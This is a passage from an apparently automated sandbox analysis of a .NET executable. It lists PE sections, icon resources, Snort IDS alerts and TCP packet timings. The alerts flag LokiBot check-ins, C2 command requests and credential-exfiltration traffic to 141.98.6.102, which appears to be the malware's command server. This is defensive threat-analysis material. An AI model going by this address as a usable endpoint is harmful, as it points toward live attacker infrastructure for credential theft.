                                                                                                          .reloc0x500000xc0x200False0.044921875data0.08153941234324169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                          Resources

                                                                                                          NameRVASizeTypeLanguageCountry
                                                                                                          RT_ICON0x42200x42028Device independent bitmap graphic, 256 x 512 x 32, image size 270336
                                                                                                          RT_ICON0x462480x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896
                                                                                                          RT_ICON0x4a4700x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600
                                                                                                          RT_ICON0x4ca180x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224
                                                                                                          RT_ICON0x4dac00x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400
                                                                                                          RT_ICON0x4e4480x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088
                                                                                                          RT_GROUP_ICON0x4e8b00x5adata
                                                                                                          RT_VERSION0x4e90c0x4bcdata
                                                                                                          RT_MANIFEST0x4edc80x204XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (513), with no line terminators

                                                                                                          Imports

                                                                                                          DLLImport
                                                                                                          mscoree.dll_CorExeMain

                                                                                                          Network Behavior

                                                                                                          Snort IDS Alerts

                                                                                                          TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                          192.168.2.7141.98.6.10249731802021641 11/29/22-16:52:33.757391TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973180192.168.2.7141.98.6.102
                                                                                                          192.168.2.7141.98.6.10249720802025381 11/29/22-16:52:28.227779TCP2025381ET TROJAN LokiBot Checkin4972080192.168.2.7141.98.6.102
                                                                                                          192.168.2.7141.98.6.10249717802025381 11/29/22-16:52:26.668343TCP2025381ET TROJAN LokiBot Checkin4971780192.168.2.7141.98.6.102
                                                                                                          192.168.2.7141.98.6.10249726802025381 11/29/22-16:52:31.339365TCP2025381ET TROJAN LokiBot Checkin4972680192.168.2.7141.98.6.102
                                                                                                          192.168.2.7141.98.6.10249725802024313 11/29/22-16:52:30.920170TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14972580192.168.2.7141.98.6.102
                                                                                                          192.168.2.7141.98.6.10249725802024318 11/29/22-16:52:30.920170TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24972580192.168.2.7141.98.6.102
                                                                                                          192.168.2.7141.98.6.10249716802024317 11/29/22-16:52:25.029133TCP2024317ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M24971680192.168.2.7141.98.6.102
                                                                                                          192.168.2.7141.98.6.10249722802021641 11/29/22-16:52:29.504056TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4972280192.168.2.7141.98.6.102
                                                                                                          192.168.2.7141.98.6.10249716802024312 11/29/22-16:52:25.029133TCP2024312ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M14971680192.168.2.7141.98.6.102
                                                                                                          192.168.2.7141.98.6.10249718802825766 11/29/22-16:52:27.285136TCP2825766ETPRO TROJAN LokiBot Checkin M24971880192.168.2.7141.98.6.102
                                                                                                          192.168.2.7141.98.6.10249719802021641 11/29/22-16:52:27.785438TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4971980192.168.2.7141.98.6.102
                                                                                                          192.168.2.7141.98.6.10249727802825766 11/29/22-16:52:31.817491TCP2825766ETPRO TROJAN LokiBot Checkin M24972780192.168.2.7141.98.6.102
                                                                                                          192.168.2.7141.98.6.10249721802825766 11/29/22-16:52:28.704063TCP2825766ETPRO TROJAN LokiBot Checkin M24972180192.168.2.7141.98.6.102
                                                                                                          192.168.2.7141.98.6.10249730802825766 11/29/22-16:52:33.273429TCP2825766ETPRO TROJAN LokiBot Checkin M24973080192.168.2.7141.98.6.102
                                                                                                          192.168.2.7141.98.6.10249728802021641 11/29/22-16:52:32.198993TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4972880192.168.2.7141.98.6.102
                                                                                                          192.168.2.7141.98.6.10249730802025381 11/29/22-16:52:33.273429TCP2025381ET TROJAN LokiBot Checkin4973080192.168.2.7141.98.6.102
                                                                                                          192.168.2.7141.98.6.10249721802021641 11/29/22-16:52:28.704063TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4972180192.168.2.7141.98.6.102
                                                                                                          192.168.2.7141.98.6.10249727802021641 11/29/22-16:52:31.817491TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4972780192.168.2.7141.98.6.102
                                                                                                          192.168.2.7141.98.6.10249717802825766 11/29/22-16:52:26.668343TCP2825766ETPRO TROJAN LokiBot Checkin M24971780192.168.2.7141.98.6.102
                                                                                                          192.168.2.7141.98.6.10249732802021641 11/29/22-16:52:36.325135TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973280192.168.2.7141.98.6.102
                                                                                                          141.98.6.102192.168.2.780497182025483 11/29/22-16:52:27.393637TCP2025483ET TROJAN LokiBot Fake 404 Response8049718141.98.6.102192.168.2.7
                                                                                                          192.168.2.7141.98.6.10249718802025381 11/29/22-16:52:27.285136TCP2025381ET TROJAN LokiBot Checkin4971880192.168.2.7141.98.6.102
                                                                                                          192.168.2.7141.98.6.10249728802825766 11/29/22-16:52:32.198993TCP2825766ETPRO TROJAN LokiBot Checkin M24972880192.168.2.7141.98.6.102
                                                                                                          141.98.6.102192.168.2.780497212025483 11/29/22-16:52:28.798694TCP2025483ET TROJAN LokiBot Fake 404 Response8049721141.98.6.102192.168.2.7
                                                                                                          141.98.6.102192.168.2.780497202025483 11/29/22-16:52:28.346106TCP2025483ET TROJAN LokiBot Fake 404 Response8049720141.98.6.102192.168.2.7
                                                                                                          192.168.2.7141.98.6.10249717802024312 11/29/22-16:52:26.668343TCP2024312ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M14971780192.168.2.7141.98.6.102
                                                                                                          192.168.2.7141.98.6.10249726802021641 11/29/22-16:52:31.339365TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4972680192.168.2.7141.98.6.102
                                                                                                          192.168.2.7141.98.6.10249723802024318 11/29/22-16:52:30.023507TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24972380192.168.2.7141.98.6.102
                                                                                                          192.168.2.7141.98.6.10249720802024318 11/29/22-16:52:28.227779TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24972080192.168.2.7141.98.6.102
                                                                                                          141.98.6.102192.168.2.780497242025483 11/29/22-16:52:30.593492TCP2025483ET TROJAN LokiBot Fake 404 Response8049724141.98.6.102192.168.2.7
                                                                                                          141.98.6.102192.168.2.780497252025483 11/29/22-16:52:31.018575TCP2025483ET TROJAN LokiBot Fake 404 Response8049725141.98.6.102192.168.2.7
                                                                                                          192.168.2.7141.98.6.10249731802025381 11/29/22-16:52:33.757391TCP2025381ET TROJAN LokiBot Checkin4973180192.168.2.7141.98.6.102
                                                                                                          192.168.2.7141.98.6.10249722802025381 11/29/22-16:52:29.504056TCP2025381ET TROJAN LokiBot Checkin4972280192.168.2.7141.98.6.102
                                                                                                          192.168.2.7141.98.6.10249717802024317 11/29/22-16:52:26.668343TCP2024317ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M24971780192.168.2.7141.98.6.102
                                                                                                          192.168.2.7141.98.6.10249723802024313 11/29/22-16:52:30.023507TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14972380192.168.2.7141.98.6.102
                                                                                                          192.168.2.7141.98.6.10249716802025381 11/29/22-16:52:25.029133TCP2025381ET TROJAN LokiBot Checkin4971680192.168.2.7141.98.6.102
                                                                                                          192.168.2.7141.98.6.10249719802025381 11/29/22-16:52:27.785438TCP2025381ET TROJAN LokiBot Checkin4971980192.168.2.7141.98.6.102
                                                                                                          192.168.2.7141.98.6.10249720802024313 11/29/22-16:52:28.227779TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14972080192.168.2.7141.98.6.102
                                                                                                          192.168.2.7141.98.6.10249725802025381 11/29/22-16:52:30.920170TCP2025381ET TROJAN LokiBot Checkin4972580192.168.2.7141.98.6.102
                                                                                                          192.168.2.7141.98.6.10249726802825766 11/29/22-16:52:31.339365TCP2825766ETPRO TROJAN LokiBot Checkin M24972680192.168.2.7141.98.6.102
                                                                                                          192.168.2.7141.98.6.10249718802021641 11/29/22-16:52:27.285136TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4971880192.168.2.7141.98.6.102
                                                                                                          192.168.2.7141.98.6.10249732802825766 11/29/22-16:52:36.325135TCP2825766ETPRO TROJAN LokiBot Checkin M24973280192.168.2.7141.98.6.102
                                                                                                          192.168.2.7141.98.6.10249727802025381 11/29/22-16:52:31.817491TCP2025381ET TROJAN LokiBot Checkin4972780192.168.2.7141.98.6.102
                                                                                                          141.98.6.102192.168.2.780497282025483 11/29/22-16:52:32.293466TCP2025483ET TROJAN LokiBot Fake 404 Response8049728141.98.6.102192.168.2.7
                                                                                                          192.168.2.7141.98.6.10249729802021641 11/29/22-16:52:32.689634TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4972980192.168.2.7141.98.6.102
                                                                                                          192.168.2.7141.98.6.10249730802021641 11/29/22-16:52:33.273429TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973080192.168.2.7141.98.6.102
                                                                                                          192.168.2.7141.98.6.10249724802021641 11/29/22-16:52:30.488585TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4972480192.168.2.7141.98.6.102
                                                                                                          192.168.2.7141.98.6.10249731802024313 11/29/22-16:52:33.757391TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14973180192.168.2.7141.98.6.102
                                                                                                          192.168.2.7141.98.6.10249722802024318 11/29/22-16:52:29.504056TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24972280192.168.2.7141.98.6.102
                                                                                                          192.168.2.7141.98.6.10249725802021641 11/29/22-16:52:30.920170TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4972580192.168.2.7141.98.6.102
                                                                                                          192.168.2.7141.98.6.10249728802024318 11/29/22-16:52:32.198993TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24972880192.168.2.7141.98.6.102
                                                                                                          192.168.2.7141.98.6.10249719802024318 11/29/22-16:52:27.785438TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24971980192.168.2.7141.98.6.102
                                                                                                          192.168.2.7141.98.6.10249732802025381 11/29/22-16:52:36.325135TCP2025381ET TROJAN LokiBot Checkin4973280192.168.2.7141.98.6.102
                                                                                                          192.168.2.7141.98.6.10249731802024318 11/29/22-16:52:33.757391TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24973180192.168.2.7141.98.6.102
                                                                                                          192.168.2.7141.98.6.10249723802025381 11/29/22-16:52:30.023507TCP2025381ET TROJAN LokiBot Checkin4972380192.168.2.7141.98.6.102
                                                                                                          192.168.2.7141.98.6.10249722802024313 11/29/22-16:52:29.504056TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14972280192.168.2.7141.98.6.102
                                                                                                          192.168.2.7141.98.6.10249719802024313 11/29/22-16:52:27.785438TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14971980192.168.2.7141.98.6.102
                                                                                                          192.168.2.7141.98.6.10249716802021641 11/29/22-16:52:25.029133TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4971680192.168.2.7141.98.6.102
                                                                                                          141.98.6.102192.168.2.780497312025483 11/29/22-16:52:33.852928TCP2025483ET TROJAN LokiBot Fake 404 Response8049731141.98.6.102192.168.2.7
                                                                                                          141.98.6.102192.168.2.780497302025483 11/29/22-16:52:33.400113TCP2025483ET TROJAN LokiBot Fake 404 Response8049730141.98.6.102192.168.2.7
                                                                                                          141.98.6.102192.168.2.780497322025483 11/29/22-16:52:36.428850TCP2025483ET TROJAN LokiBot Fake 404 Response8049732141.98.6.102192.168.2.7
                                                                                                          192.168.2.7141.98.6.10249728802024313 11/29/22-16:52:32.198993TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14972880192.168.2.7141.98.6.102
                                                                                                          192.168.2.7141.98.6.10249724802825766 11/29/22-16:52:30.488585TCP2825766ETPRO TROJAN LokiBot Checkin M24972480192.168.2.7141.98.6.102
                                                                                                          192.168.2.7141.98.6.10249729802825766 11/29/22-16:52:32.689634TCP2825766ETPRO TROJAN LokiBot Checkin M24972980192.168.2.7141.98.6.102
                                                                                                          192.168.2.7141.98.6.10249727802024313 11/29/22-16:52:31.817491TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14972780192.168.2.7141.98.6.102
                                                                                                          192.168.2.7141.98.6.10249723802825766 11/29/22-16:52:30.023507TCP2825766ETPRO TROJAN LokiBot Checkin M24972380192.168.2.7141.98.6.102
                                                                                                          192.168.2.7141.98.6.10249721802024313 11/29/22-16:52:28.704063TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14972180192.168.2.7141.98.6.102
                                                                                                          192.168.2.7141.98.6.10249724802025381 11/29/22-16:52:30.488585TCP2025381ET TROJAN LokiBot Checkin4972480192.168.2.7141.98.6.102
                                                                                                          192.168.2.7141.98.6.10249721802024318 11/29/22-16:52:28.704063TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24972180192.168.2.7141.98.6.102
                                                                                                          141.98.6.102192.168.2.780497272025483 11/29/22-16:52:31.911870TCP2025483ET TROJAN LokiBot Fake 404 Response8049727141.98.6.102192.168.2.7
                                                                                                          141.98.6.102192.168.2.780497292025483 11/29/22-16:52:32.805162TCP2025483ET TROJAN LokiBot Fake 404 Response8049729141.98.6.102192.168.2.7
                                                                                                          192.168.2.7141.98.6.10249727802024318 11/29/22-16:52:31.817491TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24972780192.168.2.7141.98.6.102
                                                                                                          192.168.2.7141.98.6.10249729802025381 11/29/22-16:52:32.689634TCP2025381ET TROJAN LokiBot Checkin4972980192.168.2.7141.98.6.102
                                                                                                          192.168.2.7141.98.6.10249716802825766 11/29/22-16:52:25.029133TCP2825766ETPRO TROJAN LokiBot Checkin M24971680192.168.2.7141.98.6.102
                                                                                                          192.168.2.7141.98.6.10249719802825766 11/29/22-16:52:27.785438TCP2825766ETPRO TROJAN LokiBot Checkin M24971980192.168.2.7141.98.6.102
                                                                                                          192.168.2.7141.98.6.10249725802825766 11/29/22-16:52:30.920170TCP2825766ETPRO TROJAN LokiBot Checkin M24972580192.168.2.7141.98.6.102
                                                                                                          192.168.2.7141.98.6.10249717802021641 11/29/22-16:52:26.668343TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4971780192.168.2.7141.98.6.102
                                                                                                          141.98.6.102192.168.2.780497222025483 11/29/22-16:52:29.613062TCP2025483ET TROJAN LokiBot Fake 404 Response8049722141.98.6.102192.168.2.7
                                                                                                          192.168.2.7141.98.6.10249726802024313 11/29/22-16:52:31.339365TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14972680192.168.2.7141.98.6.102
                                                                                                          192.168.2.7141.98.6.10249722802825766 11/29/22-16:52:29.504056TCP2825766ETPRO TROJAN LokiBot Checkin M24972280192.168.2.7141.98.6.102
                                                                                                          141.98.6.102192.168.2.780497232025483 11/29/22-16:52:30.124555TCP2025483ET TROJAN LokiBot Fake 404 Response8049723141.98.6.102192.168.2.7
                                                                                                          141.98.6.102192.168.2.780497262025483 11/29/22-16:52:31.441372TCP2025483ET TROJAN LokiBot Fake 404 Response8049726141.98.6.102192.168.2.7
                                                                                                          192.168.2.7141.98.6.10249732802024313 11/29/22-16:52:36.325135TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14973280192.168.2.7141.98.6.102
                                                                                                          192.168.2.7141.98.6.10249726802024318 11/29/22-16:52:31.339365TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24972680192.168.2.7141.98.6.102
                                                                                                          192.168.2.7141.98.6.10249728802025381 11/29/22-16:52:32.198993TCP2025381ET TROJAN LokiBot Checkin4972880192.168.2.7141.98.6.102
                                                                                                          192.168.2.7141.98.6.10249723802021641 11/29/22-16:52:30.023507TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4972380192.168.2.7141.98.6.102
                                                                                                          192.168.2.7141.98.6.10249732802024318 11/29/22-16:52:36.325135TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24973280192.168.2.7141.98.6.102
                                                                                                          192.168.2.7141.98.6.10249720802021641 11/29/22-16:52:28.227779TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4972080192.168.2.7141.98.6.102
                                                                                                          192.168.2.7141.98.6.10249718802024318 11/29/22-16:52:27.285136TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24971880192.168.2.7141.98.6.102
                                                                                                          141.98.6.102192.168.2.780497192025483 11/29/22-16:52:27.888790TCP2025483ET TROJAN LokiBot Fake 404 Response8049719141.98.6.102192.168.2.7
                                                                                                          192.168.2.7141.98.6.10249729802024318 11/29/22-16:52:32.689634TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24972980192.168.2.7141.98.6.102
                                                                                                          192.168.2.7141.98.6.10249731802825766 11/29/22-16:52:33.757391TCP2825766ETPRO TROJAN LokiBot Checkin M24973180192.168.2.7141.98.6.102
                                                                                                          192.168.2.7141.98.6.10249729802024313 11/29/22-16:52:32.689634TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14972980192.168.2.7141.98.6.102
                                                                                                          192.168.2.7141.98.6.10249730802024318 11/29/22-16:52:33.273429TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24973080192.168.2.7141.98.6.102
                                                                                                          192.168.2.7141.98.6.10249730802024313 11/29/22-16:52:33.273429TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14973080192.168.2.7141.98.6.102
                                                                                                          192.168.2.7141.98.6.10249721802025381 11/29/22-16:52:28.704063TCP2025381ET TROJAN LokiBot Checkin4972180192.168.2.7141.98.6.102
                                                                                                          192.168.2.7141.98.6.10249724802024318 11/29/22-16:52:30.488585TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24972480192.168.2.7141.98.6.102
                                                                                                          192.168.2.7141.98.6.10249718802024313 11/29/22-16:52:27.285136TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14971880192.168.2.7141.98.6.102
                                                                                                          192.168.2.7141.98.6.10249720802825766 11/29/22-16:52:28.227779TCP2825766ETPRO TROJAN LokiBot Checkin M24972080192.168.2.7141.98.6.102
                                                                                                          192.168.2.7141.98.6.10249724802024313 11/29/22-16:52:30.488585TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14972480192.168.2.7141.98.6.102

                                                                                                          Network Port Distribution

                                                                                                          TCP Packets

                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                          Nov 29, 2022 16:52:24.997996092 CET4971680192.168.2.7141.98.6.102
                                                                                                          Nov 29, 2022 16:52:25.025604963 CET8049716141.98.6.102192.168.2.7
                                                                                                          Nov 29, 2022 16:52:25.025755882 CET4971680192.168.2.7141.98.6.102
                                                                                                          Nov 29, 2022 16:52:25.029133081 CET4971680192.168.2.7141.98.6.102
                                                                                                          Nov 29, 2022 16:52:25.056865931 CET8049716141.98.6.102192.168.2.7
                                                                                                          Nov 29, 2022 16:52:25.057019949 CET4971680192.168.2.7141.98.6.102
                                                                                                          Nov 29, 2022 16:52:25.084474087 CET8049716141.98.6.102192.168.2.7
                                                                                                          Nov 29, 2022 16:52:25.134174109 CET8049716141.98.6.102192.168.2.7
                                                                                                          Nov 29, 2022 16:52:25.134202957 CET8049716141.98.6.102192.168.2.7
                                                                                                          Nov 29, 2022 16:52:25.134368896 CET4971680192.168.2.7141.98.6.102
                                                                                                          Nov 29, 2022 16:52:25.134368896 CET4971680192.168.2.7141.98.6.102
                                                                                                          Nov 29, 2022 16:52:25.483601093 CET4971680192.168.2.7141.98.6.102
                                                                                                          Nov 29, 2022 16:52:25.510782003 CET8049716141.98.6.102192.168.2.7
                                                                                                          Nov 29, 2022 16:52:25.628839970 CET4971780192.168.2.7141.98.6.102
                                                                                                          Nov 29, 2022 16:52:26.658721924 CET8049717141.98.6.102192.168.2.7
                                                                                                          Nov 29, 2022 16:52:26.658849001 CET4971780192.168.2.7141.98.6.102
                                                                                                          Nov 29, 2022 16:52:26.668343067 CET4971780192.168.2.7141.98.6.102
                                                                                                          Nov 29, 2022 16:52:26.696173906 CET8049717141.98.6.102192.168.2.7
                                                                                                          Nov 29, 2022 16:52:26.698062897 CET4971780192.168.2.7141.98.6.102
                                                                                                          Nov 29, 2022 16:52:26.725455999 CET8049717141.98.6.102192.168.2.7
                                                                                                          Nov 29, 2022 16:52:26.780868053 CET8049717141.98.6.102192.168.2.7
                                                                                                          Nov 29, 2022 16:52:26.782255888 CET4971780192.168.2.7141.98.6.102
                                                                                                          Nov 29, 2022 16:52:26.787746906 CET8049717141.98.6.102192.168.2.7
                                                                                                          Nov 29, 2022 16:52:26.791439056 CET4971780192.168.2.7141.98.6.102
                                                                                                          Nov 29, 2022 16:52:26.811738968 CET8049717141.98.6.102192.168.2.7
                                                                                                          Nov 29, 2022 16:52:27.252202988 CET4971880192.168.2.7141.98.6.102
                                                                                                          Nov 29, 2022 16:52:27.279365063 CET8049718141.98.6.102192.168.2.7
                                                                                                          Nov 29, 2022 16:52:27.279613972 CET4971880192.168.2.7141.98.6.102
                                                                                                          Nov 29, 2022 16:52:27.285135984 CET4971880192.168.2.7141.98.6.102
                                                                                                          Nov 29, 2022 16:52:27.313250065 CET8049718141.98.6.102192.168.2.7
                                                                                                          Nov 29, 2022 16:52:27.313807011 CET4971880192.168.2.7141.98.6.102
                                                                                                          Nov 29, 2022 16:52:27.340986967 CET8049718141.98.6.102192.168.2.7
                                                                                                          Nov 29, 2022 16:52:27.393636942 CET8049718141.98.6.102192.168.2.7
                                                                                                          Nov 29, 2022 16:52:27.393665075 CET8049718141.98.6.102192.168.2.7
                                                                                                          Nov 29, 2022 16:52:27.394037962 CET4971880192.168.2.7141.98.6.102
                                                                                                          Nov 29, 2022 16:52:27.394037962 CET4971880192.168.2.7141.98.6.102
                                                                                                          Nov 29, 2022 16:52:27.421232939 CET8049718141.98.6.102192.168.2.7
                                                                                                          Nov 29, 2022 16:52:27.755188942 CET4971980192.168.2.7141.98.6.102
                                                                                                          Nov 29, 2022 16:52:27.782188892 CET8049719141.98.6.102192.168.2.7
                                                                                                          Nov 29, 2022 16:52:27.782548904 CET4971980192.168.2.7141.98.6.102
                                                                                                          Nov 29, 2022 16:52:27.785438061 CET4971980192.168.2.7141.98.6.102
                                                                                                          Nov 29, 2022 16:52:27.812939882 CET8049719141.98.6.102192.168.2.7
                                                                                                          Nov 29, 2022 16:52:27.813057899 CET4971980192.168.2.7141.98.6.102
                                                                                                          Nov 29, 2022 16:52:27.840610981 CET8049719141.98.6.102192.168.2.7
                                                                                                          Nov 29, 2022 16:52:27.888789892 CET8049719141.98.6.102192.168.2.7
                                                                                                          Nov 29, 2022 16:52:27.888820887 CET8049719141.98.6.102192.168.2.7
                                                                                                          Nov 29, 2022 16:52:27.888894081 CET4971980192.168.2.7141.98.6.102
                                                                                                          Nov 29, 2022 16:52:27.889062881 CET4971980192.168.2.7141.98.6.102
                                                                                                          Nov 29, 2022 16:52:27.916518927 CET8049719141.98.6.102192.168.2.7
                                                                                                          Nov 29, 2022 16:52:28.194387913 CET4972080192.168.2.7141.98.6.102
                                                                                                          Nov 29, 2022 16:52:28.224909067 CET8049720141.98.6.102192.168.2.7
                                                                                                          Nov 29, 2022 16:52:28.224987030 CET4972080192.168.2.7141.98.6.102
                                                                                                          Nov 29, 2022 16:52:28.227778912 CET4972080192.168.2.7141.98.6.102
                                                                                                          Nov 29, 2022 16:52:28.258918047 CET8049720141.98.6.102192.168.2.7
                                                                                                          Nov 29, 2022 16:52:28.259017944 CET4972080192.168.2.7141.98.6.102
                                                                                                          Nov 29, 2022 16:52:28.287642002 CET8049720141.98.6.102192.168.2.7
                                                                                                          Nov 29, 2022 16:52:28.346106052 CET8049720141.98.6.102192.168.2.7
                                                                                                          Nov 29, 2022 16:52:28.346132994 CET8049720141.98.6.102192.168.2.7
                                                                                                          Nov 29, 2022 16:52:28.346256971 CET4972080192.168.2.7141.98.6.102
                                                                                                          Nov 29, 2022 16:52:28.346374989 CET4972080192.168.2.7141.98.6.102
                                                                                                          Nov 29, 2022 16:52:28.374067068 CET8049720141.98.6.102192.168.2.7
                                                                                                          Nov 29, 2022 16:52:28.664561987 CET4972180192.168.2.7141.98.6.102
                                                                                                          Nov 29, 2022 16:52:28.696398973 CET8049721141.98.6.102192.168.2.7
                                                                                                          Nov 29, 2022 16:52:28.697771072 CET4972180192.168.2.7141.98.6.102
                                                                                                          Nov 29, 2022 16:52:28.704062939 CET4972180192.168.2.7141.98.6.102
                                                                                                          Nov 29, 2022 16:52:28.731311083 CET8049721141.98.6.102192.168.2.7
                                                                                                          Nov 29, 2022 16:52:28.731426001 CET4972180192.168.2.7141.98.6.102
                                                                                                          Nov 29, 2022 16:52:28.758908033 CET8049721141.98.6.102192.168.2.7
                                                                                                          Nov 29, 2022 16:52:28.798693895 CET8049721141.98.6.102192.168.2.7
                                                                                                          Nov 29, 2022 16:52:28.798743010 CET8049721141.98.6.102192.168.2.7
                                                                                                          Nov 29, 2022 16:52:28.798816919 CET4972180192.168.2.7141.98.6.102
                                                                                                          Nov 29, 2022 16:52:28.798846960 CET4972180192.168.2.7141.98.6.102
                                                                                                          Nov 29, 2022 16:52:28.825839996 CET8049721141.98.6.102192.168.2.7
                                                                                                          Nov 29, 2022 16:52:29.469907999 CET4972280192.168.2.7141.98.6.102
                                                                                                          Nov 29, 2022 16:52:29.496885061 CET8049722141.98.6.102192.168.2.7
                                                                                                          Nov 29, 2022 16:52:29.497585058 CET4972280192.168.2.7141.98.6.102
                                                                                                          Nov 29, 2022 16:52:29.504055977 CET4972280192.168.2.7141.98.6.102
                                                                                                          Nov 29, 2022 16:52:29.531132936 CET8049722141.98.6.102192.168.2.7
                                                                                                          Nov 29, 2022 16:52:29.535098076 CET4972280192.168.2.7141.98.6.102
                                                                                                          Nov 29, 2022 16:52:29.563505888 CET8049722141.98.6.102192.168.2.7
                                                                                                          Nov 29, 2022 16:52:29.613061905 CET8049722141.98.6.102192.168.2.7
                                                                                                          Nov 29, 2022 16:52:29.613097906 CET8049722141.98.6.102192.168.2.7
                                                                                                          Nov 29, 2022 16:52:29.613223076 CET4972280192.168.2.7141.98.6.102
                                                                                                          Nov 29, 2022 16:52:29.613276958 CET4972280192.168.2.7141.98.6.102
                                                                                                          Nov 29, 2022 16:52:29.640557051 CET8049722141.98.6.102192.168.2.7
                                                                                                          Nov 29, 2022 16:52:29.990570068 CET4972380192.168.2.7141.98.6.102
                                                                                                          Nov 29, 2022 16:52:30.019546986 CET8049723141.98.6.102192.168.2.7
                                                                                                          Nov 29, 2022 16:52:30.019854069 CET4972380192.168.2.7141.98.6.102
                                                                                                          Nov 29, 2022 16:52:30.023507118 CET4972380192.168.2.7141.98.6.102
                                                                                                          Nov 29, 2022 16:52:30.051748991 CET8049723141.98.6.102192.168.2.7
                                                                                                          Nov 29, 2022 16:52:30.051918030 CET4972380192.168.2.7141.98.6.102
                                                                                                          Nov 29, 2022 16:52:30.080476999 CET8049723141.98.6.102192.168.2.7
                                                                                                          Nov 29, 2022 16:52:30.124555111 CET8049723141.98.6.102192.168.2.7
                                                                                                          Nov 29, 2022 16:52:30.124568939 CET8049723141.98.6.102192.168.2.7
                                                                                                          Nov 29, 2022 16:52:30.124695063 CET4972380192.168.2.7141.98.6.102
                                                                                                          Nov 29, 2022 16:52:30.124789000 CET4972380192.168.2.7141.98.6.102
                                                                                                          Nov 29, 2022 16:52:30.153004885 CET8049723141.98.6.102192.168.2.7
                                                                                                          Nov 29, 2022 16:52:30.451586008 CET4972480192.168.2.7141.98.6.102
                                                                                                          Nov 29, 2022 16:52:30.484905958 CET8049724141.98.6.102192.168.2.7
                                                                                                          Nov 29, 2022 16:52:30.485016108 CET4972480192.168.2.7141.98.6.102
                                                                                                          Nov 29, 2022 16:52:30.488584995 CET4972480192.168.2.7141.98.6.102
                                                                                                          Nov 29, 2022 16:52:30.515909910 CET8049724141.98.6.102192.168.2.7
                                                                                                          Nov 29, 2022 16:52:30.515988111 CET4972480192.168.2.7141.98.6.102
                                                                                                          Nov 29, 2022 16:52:30.542931080 CET8049724141.98.6.102192.168.2.7
                                                                                                          Nov 29, 2022 16:52:30.593492031 CET8049724141.98.6.102192.168.2.7
                                                                                                          Nov 29, 2022 16:52:30.593591928 CET8049724141.98.6.102192.168.2.7
                                                                                                          Nov 29, 2022 16:52:30.593751907 CET4972480192.168.2.7141.98.6.102
                                                                                                          Nov 29, 2022 16:52:30.593856096 CET4972480192.168.2.7141.98.6.102
                                                                                                          Nov 29, 2022 16:52:30.622663975 CET8049724141.98.6.102192.168.2.7
                                                                                                          Nov 29, 2022 16:52:30.885688066 CET4972580192.168.2.7141.98.6.102
                                                                                                          Nov 29, 2022 16:52:30.914381981 CET8049725141.98.6.102192.168.2.7
                                                                                                          Nov 29, 2022 16:52:30.914582968 CET4972580192.168.2.7141.98.6.102
                                                                                                          Nov 29, 2022 16:52:30.920170069 CET4972580192.168.2.7141.98.6.102
                                                                                                          Nov 29, 2022 16:52:30.948014975 CET8049725141.98.6.102192.168.2.7
                                                                                                          Nov 29, 2022 16:52:30.948132038 CET4972580192.168.2.7141.98.6.102
                                                                                                          Nov 29, 2022 16:52:30.975564957 CET8049725141.98.6.102192.168.2.7
                                                                                                          Nov 29, 2022 16:52:31.018574953 CET8049725141.98.6.102192.168.2.7
